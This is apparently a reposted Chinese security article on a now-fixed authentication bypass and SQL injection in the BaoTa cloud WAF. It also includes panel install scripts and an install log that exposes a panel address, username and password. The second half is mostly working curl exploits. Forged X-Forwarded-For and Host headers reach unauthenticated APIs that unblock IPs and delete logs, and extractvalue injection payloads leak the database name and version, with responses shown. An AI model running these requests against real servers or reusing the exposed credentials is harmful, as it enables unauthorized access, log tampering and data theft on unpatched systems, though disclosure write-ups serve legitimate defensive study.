宝塔WAF防火墙最新版未授权访问漏洞+SQL 注入漏洞（已修复）

宝塔面板最新版安装

Linux面板8.0.5安装脚本

Centos安装脚本

yum install -y wget && wget -O install.sh https://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484bec

Ubuntu/Deepin安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ed8484bec

Debian安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh ed8484bec

万能安装脚本

if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh ed8484bec

国产龙芯架构安装脚本

wget -O install_panel.sh https://download.bt.cn/install/0/loongarch64/loongarch64_install_panel.sh && bash install_panel.sh ed8484bec

注意：必须为没装过其它环境如Apache/Nginx/php/MySQL的新系统,推荐使用centos 7.X的系统安装宝塔面板

推荐使用Chrome、火狐、edge浏览器，国产浏览器请使用极速模式访问面板登录地址

如果不确定使用哪个Linux系统版本的，可以使用万能安装脚本

国产龙芯架构CPU安装命令，支持龙芯架构的loongnix 8.x、统信UOS 20、kylin v10系统

云WAF安装脚本

单机版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_cloudwaf.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_cloudwaf.sh "$URL";fi;bash install_cloudwaf.sh

集群版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_waf_master.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_waf_master.sh "$URL";fi;bash install_waf_master.sh

注意：已经安装了宝塔面板的机器，不用再安装云WAF，在宝塔面板上安装使用Nginx防火墙即可。

堡塔云WAF需要一台独立服务器安装部署。

安装完成后推荐使用Chrome、火狐、edge浏览器，国产浏览器（极速模式）访问登录系统

清理面板所有host
检测节点(0.5s)：download.bt.cn
当前可用下载节点：download.bt.cn
  
检测www节点(0.5S)：{'name': '主节点', 'url': 'www-node1.bt.cn'}
检测api节点(0.5S)：{'name': '主节点', 'url': 'api-node1.bt.cn'}
Stopping Bt-Tasks...    done
Stopping Bt-Panel...    done
Starting Bt-Panel....   done
Starting Bt-Tasks...    done
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
Package firewalld-0.6.3-13.el7_9.noarch already installed and latest version
Nothing to do
Created symlink from /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service to /usr/lib/systemd/system/firewalld.service.
Created symlink from /etc/systemd/system/multi-user.target.wants/firewalld.service to /usr/lib/systemd/system/firewalld.service.
success
==================================================================
Congratulations! Installed successfully!
========================面板账户登录信息==========================


 外网面板地址: https://8.141.89.22:35952/4c2265a0
 内网面板地址: https://172.17.225.236:35952/4c2265a0
 username: yusci8xm
 password: 7553f5d7
 
=========================打开面板前请看===========================


 【云服务器】请在安全组放行 35952 端口
 因默认启用自签证书https加密访问，浏览器将提示不安全
 点击【高级】-【继续访问】或【接受风险并继续】访问
 教程：https://www.bt.cn/bbs/thread-117246-1-1.html


==================================================================

未授权访问漏洞

2024年2月17日15:13发布更新：宝塔回应称该漏洞去年就已经修复，同时该漏洞仅可以查询数据、无法造成其他威胁。另外宝塔WAF防火墙与宝塔面板是两个产品，存在漏洞的产品是WAF防火墙，不是宝塔面板。

据 V2EX 网友发布的帖子，在春节期间他在研究宝塔面板的漏洞时，发现宝塔面板附带的 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞。

宝塔面板的 WAF 本身是一款收费产品，购买并开通后可以用来拦截 CC 攻击或者 SQL 注入之类的，但没想到这个模块本身也存在 SQL 注入漏洞。

漏洞位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 中，构造满足特定条件的 IP 地址和域名的情况下，不需要进行任何验证即可访问宝塔面板 API。

而且还可以他通过将 x-forwarded-for header 设置为 127.0.0.1、域名设置为 127.0.0.251 来满足上面要求的条件。

配置 x-forwarded-for 头为 127.0.0.1 即可满足 ip 是 127.0.0.1 的条件

配置 host 头为 127.0.0.251 即可满足域名是 127.0.0.251 的条件

提供一条 curl 参数供大家参考

curl 'http://宝塔地址/API'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_btwaf_drop_ip

这个 API 用来获取已经拉黑的 IP 列表，使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

remove_btwaf_drop_ip

这个 API 用来解封 IP ，提供一个 get 参数即可，使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/remove_btwaf_drop_ip?ip=1.2.3.4'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_drop_ip

这个 API 用来解封所有 IP ，使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/clean_btwaf_drop_ip'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

updateinfo

这个 API 看起来是更新配置用的，需要一个 types 参数做校验，但实际并没有什么用处，使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/updateinfo?types'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_site_status

这个 API 用来获取网站的配置，server_name 参数需要提供网站的域名，使用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn'  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_logs

这个 API 用来删除宝塔的所有日志，使用以下命令发起访问

curl "http://btwaf-demo.bt.cn/clean_btwaf_logs"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

后续还有一些 API 大同小异，不一一列举了

get_global_status

clear_speed_hit

clear_replace_hit

reset_customize_cc

clear_speed_countsize

SQL注入

代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中，源文件是 luajit 编译后的内容，反编译一下即可看到源码

代码逻辑就在 get_site_status API 中，slot1 变量就是 server_name 参数。原理很简单，server_name 参数没有做任何校验就直接带入了 SQL 查询。

宝塔官网目前已经修复这个问题，拿之前的测试记录为例，试试以下命令：

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\btwaf': 1105: HY000."}

从响应来看已经注入成功，通过 updatexml 的报错成功的爆出了库名叫 btwaf

继续执行以下命令：

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\8.1.0': 1105: HY000."}

从响应来看，mySQL 版本是 8.1.0

在继续执行以下命令

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,(select'hello,world')))-'"  -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

响应如下

{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\hello,world': 1105: HY000."}

看起来 select ‘hello,world’ 也执行成功了，到此为止，基本可以执行任意命令。

本文来源于利刃信安